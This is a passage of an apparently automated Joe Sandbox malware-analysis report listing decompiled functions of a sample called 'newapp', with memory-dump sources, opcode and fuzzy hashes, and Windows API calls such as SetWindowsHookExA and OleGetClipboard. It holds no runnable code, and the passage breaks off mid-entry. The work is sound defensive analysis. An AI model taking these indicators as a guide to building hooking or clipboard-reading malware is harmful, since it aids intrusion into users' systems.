$^q, xrefs: 067FAF24
$^q, xrefs: 067FAF30
$^q, xrefs: 067FAF5F
$^q, xrefs: 067FAF7C
$^q, xrefs: 067FAF53
$^q, xrefs: 067FAF88
$^q, xrefs: 067FAED1

Memory Dump Source

Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-3823777903
Opcode ID: 59969acbc22c1950587c51024316d6c9bc3a44d88a4cb135d9a81d63d45629be
Instruction ID: 05ebe694a395e6c174d412c1ab59e23f23e3ce46d0c038346966e86280653e95
Opcode Fuzzy Hash: 59969acbc22c1950587c51024316d6c9bc3a44d88a4cb135d9a81d63d45629be
Instruction Fuzzy Hash: DDE16D30E2020ACFCF55DFA9D594AAEB7B2FF85704F248529D5099B354DB31D846CB81

Function 067FB730 Relevance: 8.0, Strings: 6, Instructions: 474COMMON

Download Yara Rule

Strings

$^q, xrefs: 067FBCB5
$^q, xrefs: 067FBCC1
$^q, xrefs: 067FBC8D
$^q, xrefs: 067FBCF5
$^q, xrefs: 067FBCE9
$^q, xrefs: 067FBC81

Memory Dump Source

Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q$$^q$$^q
API String ID: 0-2392861976
Opcode ID: 403f62111d813f7e2b7b5171023f803970118d6eea445bcf24c82784fd52ad61
Instruction ID: 4a59073bcc0d77f027daadcb405e3b07ea7d6314a3235a4bfcb0a7b19b4a59e3
Opcode Fuzzy Hash: 403f62111d813f7e2b7b5171023f803970118d6eea445bcf24c82784fd52ad61
Instruction Fuzzy Hash: 6E027C30E202098FDBA4DF68D580AADB7B2FF85B10F24896AD505DB355DB31DC86CB91

Function 067EA247 Relevance: 6.2, APIs: 4, Instructions: 202
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 067EA326
GetCurrentThread.KERNEL32 ref: 067EA363
GetCurrentProcess.KERNEL32 ref: 067EA3A0
GetCurrentThreadId.KERNEL32 ref: 067EA3F9

Memory Dump Source

Source File: 0000000E.00000002.2957568057.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_67e0000_newapp.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: b3e787083555efbb3cb3bf5028f77c098309259ab9153dd6364ce1e5e86cb541
Instruction ID: aafc1263cdc289d21f17c8756ee77d010e86a2b308c3fe6df0efe361e473ed37
Opcode Fuzzy Hash: b3e787083555efbb3cb3bf5028f77c098309259ab9153dd6364ce1e5e86cb541
Instruction Fuzzy Hash: 659167B09003498FDB44DFA9D948BEEBFF1EB88314F24C46AD059A7261D7349948CFA5

Function 067EA299 Relevance: 6.1, APIs: 4, Instructions: 135
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 067EA326
GetCurrentThread.KERNEL32 ref: 067EA363
GetCurrentProcess.KERNEL32 ref: 067EA3A0
GetCurrentThreadId.KERNEL32 ref: 067EA3F9

Memory Dump Source

Source File: 0000000E.00000002.2957568057.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_67e0000_newapp.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: edecce06ad19ab7ada2fceef36032c86405ca4e13e59b186e899e82b1208b3d6
Instruction ID: 1603a78821fc976a33fd49b0b4206afbfeb7f319f3525e4634cbc491ee09b732
Opcode Fuzzy Hash: edecce06ad19ab7ada2fceef36032c86405ca4e13e59b186e899e82b1208b3d6
Instruction Fuzzy Hash: 2C5148B09003498FDB54DFAAD948BDEBFF1AF49304F20C469E059A72A1D7349984CF66

Function 067EA2A8 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 067EA326
GetCurrentThread.KERNEL32 ref: 067EA363
GetCurrentProcess.KERNEL32 ref: 067EA3A0
GetCurrentThreadId.KERNEL32 ref: 067EA3F9

Memory Dump Source

Source File: 0000000E.00000002.2957568057.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_67e0000_newapp.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: d4108158af6221d12ead28426835f74b80f1d78c7922afcba6fd87168e89bbfe
Instruction ID: 6057e95b241a40ae91ac2fc3998b4a914c4143b4bc00912acfc56d5eb94536e7
Opcode Fuzzy Hash: d4108158af6221d12ead28426835f74b80f1d78c7922afcba6fd87168e89bbfe
Instruction Fuzzy Hash: 1F5126B09002098FDB54DFAAD948BDEBBF1EF48314F20C469E459A7260D7359984CF66

Function 067F9238 Relevance: 5.2, Strings: 4, Instructions: 230
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 067F92C6
$^q, xrefs: 067F928B
$^q, xrefs: 067F92BA
$^q, xrefs: 067F927F

Memory Dump Source

Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q$$^q
API String ID: 0-2125118731
Opcode ID: 60d7dfc1cb755ed81dbff7e149326a54b32adf4c24c2511cdb2785631c2eff36
Instruction ID: 90a7a9873de9c5ab55607c9834feae19ab56873d7063756dfa09a9eb4657789f
Opcode Fuzzy Hash: 60d7dfc1cb755ed81dbff7e149326a54b32adf4c24c2511cdb2785631c2eff36
Instruction Fuzzy Hash: 9F915C30F1021A9FDB94DF65D950BAEB7F6AFC8204F508569C50DEB388EA719C428B91

Function 067FD038 Relevance: 4.6, Strings: 3, Instructions: 800
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 067FD42F
$^q, xrefs: 067FD437
$^q, xrefs: 067FD443

Memory Dump Source

Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd

Similarity

API ID:
String ID: $^q$$^q$$^q
API String ID: 0-831282457
Opcode ID: 069dbbebaae3c063c75321c0bb61104db787ae49ff504e138a0d8bb2f8e6c94c
Instruction ID: 16645a3253cafb0500332f37db61783af38cfc2ae5f79821522f708dad8862ac
Opcode Fuzzy Hash: 069dbbebaae3c063c75321c0bb61104db787ae49ff504e138a0d8bb2f8e6c94c
Instruction Fuzzy Hash: AF623530A502058FCB55EF68D590A5EB7F2FF84304F148A69D1099F369EB71ED4ACB81

Function 067F4C78 Relevance: 3.9, Strings: 3, Instructions: 186
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

XPcq, xrefs: 067F4DC9
fcq, xrefs: 067F4CA3
\Ocq, xrefs: 067F4E53

Memory Dump Source

Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd

Similarity

API ID:
String ID: fcq$XPcq$\Ocq
API String ID: 0-3575482020
Opcode ID: 209927f0ecf55b82179c3448404be11f760d00d53c77db1b982fdd5ff60cdb5d
Instruction ID: beb629072e3b6ffd2769bee8c32b4e8df86f14c63517b62275194bc93ee165e6
Opcode Fuzzy Hash: 209927f0ecf55b82179c3448404be11f760d00d53c77db1b982fdd5ff60cdb5d
Instruction Fuzzy Hash: 04616F70E102199FEB549FB8C854BAEBBF6FF88700F20852AE105AB395DB754C458B91

Function 067F9228 Relevance: 2.7, Strings: 2, Instructions: 163
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$^q, xrefs: 067F92BA
$^q, xrefs: 067F927F

Memory Dump Source

Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd

Similarity

API ID:
String ID: $^q$$^q
API String ID: 0-355816377
Opcode ID: 3ae14609df4b6e20e8f7f0a3a0c8f79b24da39f254bef2314c062cc96ada548c
Instruction ID: 16ba1d09c67e59875cc8315e77760f2c1861a8020d226115c780db623f7d120d
Opcode Fuzzy Hash: 3ae14609df4b6e20e8f7f0a3a0c8f79b24da39f254bef2314c062cc96ada548c
Instruction Fuzzy Hash: A3514F30B102059FDB54DB74D990BBFB7F6EBC8648F508529C609EB788EA31DC428B95

Function 067F4C69 Relevance: 2.6, Strings: 2, Instructions: 144COMMON

Download Yara Rule

Strings

XPcq, xrefs: 067F4DC9
fcq, xrefs: 067F4CA3

Memory Dump Source

Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd

Similarity

API ID:
String ID: fcq$XPcq
API String ID: 0-936005338
Opcode ID: 712f9f5b31308fdc1871d7486d2bac4a401d85b352cb726b1713b7e1eeec16a6
Instruction ID: 033e85734455463f5964e5fb2aa17ae4aee4905b1c3795f8e437e1821ab94d0e
Opcode Fuzzy Hash: 712f9f5b31308fdc1871d7486d2bac4a401d85b352cb726b1713b7e1eeec16a6
Instruction Fuzzy Hash: 5A515B70F102099BDB55DFB9C854BAEBBF7FF88700F20852AE145AB395DA718C018B91

Function 0292EE98 Relevance: 1.6, APIs: 1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.2925048973.0000000002920000.00000040.00000800.00020000.00000000.sdmp, Offset: 02920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2920000_newapp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 944cc304b9676237929bb2ad023be25a3723000198bf2213e92f7b8e30f5310c
Instruction ID: dadffc4381a8e5e2d6fe3a3c9beb1562eb1ecbd1ae8dedd5ef693d6ed9c03579
Opcode Fuzzy Hash: 944cc304b9676237929bb2ad023be25a3723000198bf2213e92f7b8e30f5310c
Instruction Fuzzy Hash: D5415731D043958FC704CF79D8446DEBFF5AF8A310F1885AAD544DB291DB74A844CBA1

Function 067E674E Relevance: 1.6, APIs: 1, Instructions: 118COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 067E686A

Memory Dump Source

Source File: 0000000E.00000002.2957568057.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_67e0000_newapp.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: db28526820dbdd00982cfbc6d314c24e316f448f2ed850843a6f795daf4c1ee3
Instruction ID: 428e3728c85a3e8fe0a3b70a5835570cbc9f3ce6a7257c73f62ec1639409b348
Opcode Fuzzy Hash: db28526820dbdd00982cfbc6d314c24e316f448f2ed850843a6f795daf4c1ee3
Instruction Fuzzy Hash: 4051C0B5D003199FDB14CFA9D884ADEBFB5FF48310F24852AE419AB210D771A885CF91

Function 067E6758 Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 067E686A

Memory Dump Source

Source File: 0000000E.00000002.2957568057.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_67e0000_newapp.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 408a6eb2254ff1ba778ea7c48040d4d0c0da9a14378d4b8c1b6f166410822906
Instruction ID: 50c39479e172e042164198dfb2f39b3fce8998160930718227a268de100204e2
Opcode Fuzzy Hash: 408a6eb2254ff1ba778ea7c48040d4d0c0da9a14378d4b8c1b6f166410822906
Instruction Fuzzy Hash: B141B0B1D003199FDB14CF9AC884ADEBFB5FF48310F24852AE819AB210D775A885CF91

Function 067EA274 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 067EB851

Memory Dump Source

Source File: 0000000E.00000002.2957568057.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_67e0000_newapp.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: bff94191dfe1f7a1e764544435344a51030f811ef64893e47398c543313fa30c
Instruction ID: 3db5a5f28f3e7469f0f960c4ccfc0eadbe3d23ec664f2c85a48f2da7f001e2fa
Opcode Fuzzy Hash: bff94191dfe1f7a1e764544435344a51030f811ef64893e47398c543313fa30c
Instruction Fuzzy Hash: F94125B4A00309CFDB54CF99C888AAABBF5FB8C714F24C459D519AB321D334A845CFA0

Function 067EC0D4 Relevance: 1.6, APIs: 1, Instructions: 76comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 067EC168

Memory Dump Source

Source File: 0000000E.00000002.2957568057.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_67e0000_newapp.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 0efe8f90caea01c7526de476ce3df68559e31eab117d78ac4817f9763844ffca
Instruction ID: f1fc19f29e95ee84dee453995f7151c7a06d58aa914d5bd9420ef92ada24c822
Opcode Fuzzy Hash: 0efe8f90caea01c7526de476ce3df68559e31eab117d78ac4817f9763844ffca
Instruction Fuzzy Hash: 903134B4E01248EFDB14DF99C984BDEBBF5AF48304F248019E404BB294DB746949CF55

Function 067EC0E0 Relevance: 1.6, APIs: 1, Instructions: 71comclipboardCOMMON

Download Yara Rule

APIs

OleGetClipboard.OLE32(?), ref: 067EC168

Memory Dump Source

Source File: 0000000E.00000002.2957568057.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_67e0000_newapp.jbxd

Similarity

API ID: Clipboard
String ID:
API String ID: 220874293-0
Opcode ID: 93a38aa0f8efe4cad2d7e79f58c61d4c96bf216f775ec8edec7a0d34ac024c30
Instruction ID: 68784eebf3b81593abe6882460155bf14aa16921fd8e9f6d843e80d6b854fdbb
Opcode Fuzzy Hash: 93a38aa0f8efe4cad2d7e79f58c61d4c96bf216f775ec8edec7a0d34ac024c30
Instruction Fuzzy Hash: C53122B0E01248DFDB14DF99C984BDEBBF5AF48304F208019E404BB294D7746989CF95

Function 067EB290 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,067EBAA5), ref: 067EBB2F

Memory Dump Source

Source File: 0000000E.00000002.2957568057.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_67e0000_newapp.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 6308dcc69aab00bb1479c67b1b76d96252758033c41a1862bff280e3665e56c4
Instruction ID: c0afb511760013cc69a49e2ad20b6f1925d542dcf76982dc67e90ad8a38facf0
Opcode Fuzzy Hash: 6308dcc69aab00bb1479c67b1b76d96252758033c41a1862bff280e3665e56c4
Instruction Fuzzy Hash: 43219FB18093988FCB11DFA9C9547DEBFF4EF4A320F14409AD495A7251C374A948CBA5

Function 067EA4E8 Relevance: 1.6, APIs: 1, Instructions: 64COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 067EA577

Memory Dump Source

Source File: 0000000E.00000002.2957568057.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_67e0000_newapp.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 84ad8d9ea6590eda7b4f3589c439bfb777456a6667a604031b270ca3aa1ace63
Instruction ID: 11ceb64f031c1c24c16d9905ba9d834d4ec26ab4a9c870a1ab23fa1af59f8e15
Opcode Fuzzy Hash: 84ad8d9ea6590eda7b4f3589c439bfb777456a6667a604031b270ca3aa1ace63
Instruction Fuzzy Hash: A321E3B5D00259DFDB10CFAAD984AEEBFF4EB49310F14806AE955A7210C374A984CFA5

Function 067EA4F0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 067EA577

Memory Dump Source

Source File: 0000000E.00000002.2957568057.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_67e0000_newapp.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: b67141ebe0f5ee62728e342cde1b6da85d5c11609325a3dc0963b329029e4abd
Instruction ID: 39c20dd25cc4dac2f6321e95094b6643f372332ff57fab7e449f09b92c0184db
Opcode Fuzzy Hash: b67141ebe0f5ee62728e342cde1b6da85d5c11609325a3dc0963b329029e4abd
Instruction Fuzzy Hash: 8321E4B5D00208DFDB10CF9AD984ADEBFF4EB48310F14801AE914A7310C374A984CFA5

Function 067EDEA3 Relevance: 1.6, APIs: 1, Instructions: 61COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(?,00000000,?,?), ref: 067EDF23

Memory Dump Source

Source File: 0000000E.00000002.2957568057.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_67e0000_newapp.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 4b31ecee7124ee9225770ce3fad609a959c488879a2ba6e65d07833d1459571c
Instruction ID: 824578b96a501eb25a3564e6e461cc1d1b601febdd20e1bafda945f9be80c28f
Opcode Fuzzy Hash: 4b31ecee7124ee9225770ce3fad609a959c488879a2ba6e65d07833d1459571c
Instruction Fuzzy Hash: 842124B5D002099FCB14DF9AD844BEEFBF5AF88324F10842AE459A7250CB74A944CFA5

Function 067EDEA8 Relevance: 1.6, APIs: 1, Instructions: 57COMMON

Download Yara Rule

APIs

SetWindowsHookExA.USER32(?,00000000,?,?), ref: 067EDF23

Memory Dump Source

Source File: 0000000E.00000002.2957568057.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_67e0000_newapp.jbxd

Similarity

API ID: HookWindows
String ID:
API String ID: 2559412058-0
Opcode ID: 451ef8b89af92183662ec867f5d99738d10113c9aae7e4189977cb607afd325a
Instruction ID: a543e4407aeadd02461df3aeef4e55b047d3111104ff440d9f1254365d95195d
Opcode Fuzzy Hash: 451ef8b89af92183662ec867f5d99738d10113c9aae7e4189977cb607afd325a
Instruction Fuzzy Hash: 3821F2B5D002099FCB54DF9AD844BEEFBF5AF88320F10842AE459A7250C779A944CFA5

Function 0292EF80 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

GlobalMemoryStatusEx.KERNEL32(?), ref: 0292EFE7

Memory Dump Source

Source File: 0000000E.00000002.2925048973.0000000002920000.00000040.00000800.00020000.00000000.sdmp, Offset: 02920000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2920000_newapp.jbxd

Similarity

API ID: GlobalMemoryStatus
String ID:
API String ID: 1890195054-0
Opcode ID: e5779dc042f58ce289159afdd7222b097a5893802ff5b881582f5a175cdeb5d3
Instruction ID: 446e14be1b36c8f87e0348be9a9ecfb38557d9a8f13a96d57bd5a2e47f775a0f
Opcode Fuzzy Hash: e5779dc042f58ce289159afdd7222b097a5893802ff5b881582f5a175cdeb5d3
Instruction Fuzzy Hash: E91123B1D002699BCB10DF9AD544BDEFBF4AF48320F14816AE818A7250D378A944CFA5

Function 067E56A8 Relevance: 1.6, APIs: 1, Instructions: 51COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 067E5716

Memory Dump Source

Source File: 0000000E.00000002.2957568057.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_67e0000_newapp.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 00294bd164852cf39ee75e70a35d6fb383455d28df75588005920619ccd340c6
Instruction ID: d2c4311f6f903b1a9f101012737c0a23ee92b5fa462511edfa209919b8a9929e
Opcode Fuzzy Hash: 00294bd164852cf39ee75e70a35d6fb383455d28df75588005920619ccd340c6
Instruction Fuzzy Hash: 591120B5D00248CFDB20CF9AC844ADEFBF5EB88324F10842AD469A7210D376A549CFA1

Function 067E3FFC Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000), ref: 067E5716

Memory Dump Source

Source File: 0000000E.00000002.2957568057.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_67e0000_newapp.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: bbf1b549df97c00c3a12d2b19ea7606e6ea0f8505a77a2bcbedb373759133ec8
Instruction ID: 5dfdb085675ee4a8903fe3039e992f8e02309f45f29727f7b6738621a67d1814
Opcode Fuzzy Hash: bbf1b549df97c00c3a12d2b19ea7606e6ea0f8505a77a2bcbedb373759133ec8
Instruction Fuzzy Hash: 881102B5D00349CFEB10DF9AC444ADEFBF4EB89224F10846AD859B7210D375A549CFA5

Function 067EBF91 Relevance: 1.5, APIs: 1, Instructions: 48comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 067EBFED

Memory Dump Source

Source File: 0000000E.00000002.2957568057.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_67e0000_newapp.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 0131ec311ada47c9e64c6337237e117beccf649900ddaf90198e1eb2d9a3c27a
Instruction ID: c5c007a8fb6335c1f912a371e450cc2e38d31aec784026a5e877586100ed91d0
Opcode Fuzzy Hash: 0131ec311ada47c9e64c6337237e117beccf649900ddaf90198e1eb2d9a3c27a
Instruction Fuzzy Hash: 8C1136B59003488FDB20DFAAD949BDEBFF8EB48324F108459D558A7210C379A548CFA5

Function 067EB4EC Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON

Download Yara Rule

APIs

OleInitialize.OLE32(00000000), ref: 067EBFED

Memory Dump Source

Source File: 0000000E.00000002.2957568057.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_67e0000_newapp.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 66b354c90d6eb291b57e2cb081632d170ee6aa56af9716c899f808d394b4faaa
Instruction ID: ff1b07872c463e479fbce76121a9a1a3f3f1c11f6a18c7b595f36d90b568f149
Opcode Fuzzy Hash: 66b354c90d6eb291b57e2cb081632d170ee6aa56af9716c899f808d394b4faaa
Instruction Fuzzy Hash: BC1133B49003488FDB20DF9AD544BDEBFF4EB48324F108419D559A7210C378A944CFA5

Function 067EB2B4 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,067EBAA5), ref: 067EBB2F

Memory Dump Source

Source File: 0000000E.00000002.2957568057.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_67e0000_newapp.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 8bc5215221468043a7b270c5e9e9f06b45468e0162483f792609b3d16a0a2c13
Instruction ID: a5e958e9c23e4d6d923f51823e5cbfdf78d98ac126df0ff2fb108024d470777f
Opcode Fuzzy Hash: 8bc5215221468043a7b270c5e9e9f06b45468e0162483f792609b3d16a0a2c13
Instruction Fuzzy Hash: B51122B1900248CFCB60DF9AC584B9EBFF4EB48324F208429D519A7210C374A944CFA5

Function 067EBAC8 Relevance: 1.5, APIs: 1, Instructions: 46COMMON

Download Yara Rule

APIs

KiUserCallbackDispatcher.NTDLL(?,?,?,?,?,067EBAA5), ref: 067EBB2F

Memory Dump Source

Source File: 0000000E.00000002.2957568057.00000000067E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067E0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_67e0000_newapp.jbxd

Similarity

API ID: CallbackDispatcherUser
String ID:
API String ID: 2492992576-0
Opcode ID: 091ca4864f9270b952b84fe88bd40feb21a9521e45fb26c1c89960e311291fd2
Instruction ID: 134a606b1695a5bc21350f1cc1d32567a8192bbdcc44ca39cfd9134c698a0e92
Opcode Fuzzy Hash: 091ca4864f9270b952b84fe88bd40feb21a9521e45fb26c1c89960e311291fd2
Instruction Fuzzy Hash: FC1122B1800248CFCB10DF9AC988BDEFFF4EB48324F208429D519A3210D374A944CFA5

Function 067FDBAD Relevance: 1.4, Strings: 1, Instructions: 127COMMON

Download Yara Rule

Strings

PH^q, xrefs: 067FDD09

Memory Dump Source

Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: 2397998875aeb710134da9704aecbceff009db4f26467d2fefc57953b3226c81
Instruction ID: deaf77e685189e3a79ae8a44e294c96a6e1c0ea50c6bda2af4a7b3c5cbdf9fe7
Opcode Fuzzy Hash: 2397998875aeb710134da9704aecbceff009db4f26467d2fefc57953b3226c81
Instruction Fuzzy Hash: B341B370E10305DFDB61DFA5C454AAEBBB2BF85300F204929E501EB344DB75D946CB91

Function 067F21D8 Relevance: 1.4, Strings: 1, Instructions: 105COMMON

Download Yara Rule

Strings

PH^q, xrefs: 067F2313

Memory Dump Source

Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: 72400ccb463b7136cb1ee9ef1e68a75544f412ca9e4f6675d422ce511048b8f2
Instruction ID: 76b34272c5669ea3afb224b0d4278807db7295d939ac97cd14fd420984e0d5e5
Opcode Fuzzy Hash: 72400ccb463b7136cb1ee9ef1e68a75544f412ca9e4f6675d422ce511048b8f2
Instruction Fuzzy Hash: 2031D230B102018FDB559BB4D514A7E7BE3BF89200F20452DE516DB38ADE36DE46CB91

Function 067F21C5 Relevance: 1.3, Strings: 1, Instructions: 87COMMON

Download Yara Rule

Strings

PH^q, xrefs: 067F2313

Memory Dump Source

Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd

Similarity

API ID:
String ID: PH^q
API String ID: 0-2549759414
Opcode ID: f456acf335a2e7a284dd0fcc21cb8724c548950a68d2b6542c067ff0276d703a
Instruction ID: b99512fcda715a3465cda330c5e6c92668eca3d1ca2392c38e2a785885af572d
Opcode Fuzzy Hash: f456acf335a2e7a284dd0fcc21cb8724c548950a68d2b6542c067ff0276d703a
Instruction Fuzzy Hash: BF31FF30B103028FDB559BB0D514A7E7BA3BF89200F254468E516CB396DF3ACE42CB92

Function 067F4B61 Relevance: 1.3, Strings: 1, Instructions: 25COMMON

Download Yara Rule

Strings

\Ocq, xrefs: 067F4B6D

Memory Dump Source

Source File: 0000000E.00000002.2957775861.00000000067F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 067F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_67f0000_newapp.jbxd

Similarity

API ID:
String ID: \Ocq
API String ID: 0-2995510325
